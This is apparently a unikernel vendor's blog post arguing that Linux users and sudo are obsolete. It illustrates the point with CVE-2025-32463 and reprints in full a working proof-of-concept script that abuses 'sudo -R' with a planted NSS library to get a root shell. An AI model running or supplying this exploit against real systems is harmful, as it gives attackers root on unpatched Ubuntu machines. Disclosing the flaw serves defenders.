The concept of users is a very outdated concept for system administration now that we live in the age of virtualization and the cloud. A lot of organizations left this paradigm a long time ago regardless. Today it is super common to pop into an ec2 box and immediately be able to `sudo su` your way up to root. No one cares anymore. So it really begs the question of why do we even have users? Why have passwords? Why have shells? None of it makes sense if you are on a fake virtualized computer.
The concept of users can trace back to the 60s and 70s when computers were so large and so expensive they took up an entire wall. It was a business necessity that many users share the same computer. Today it makes zero sense as a lot of software doesn't even fit on a single machine anymore.
A large chunk of developers don't even interact 1:1 with linux systems anymore. They are using serverless offerings or platform-as-a-service platforms. Obviously, just as serverless users are using someone elses server, they are still running on top of linux but they aren't interacting with it.
Another change that has happened in the past 10-15 years is that observability software went through a cambrian explosion at roughly the same time that ZIRP accelerated the accumulation of software being deployed to prod. Even if people wanted to manage single individual systems - it simply doesn't make sense anymore to do so.
Now that unikernels exist you don't need to deploy your production software with these outdated concepts. Nanos unikernels don't have 'sudo'. They don't have users. They don't have passwords. They don't have shells. They don't have ssh. They don't have the capability of running other programs on the same system as the one that is already running.
Instead of virtualizing the operating system unikernels essentially virtualize your application.
CVE-2025-32463 - A Change to Root
CVE-2025-32463 was announced today by Stratascale, the cybersecurity division of SHI. It is an insanely straight-forward method to escalate your user to root on ubuntu. The root (heh!) of the problem is that sudo can call chroot multiple times regardless of whatever the sudoers file states and allows arbitrary code execution as root.
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}
There is no fix for this - you have to update if you're on an affected system.
If you think you need users we'd challenge you to re-assess and ask yourself if you really need them or you're just used to it. If it's the latter stop scrambling to patch your systems constantly. Deploy unikernels and be done with it.
Stop Deploying 50 Year Old Systems
Introducing the future cloud.
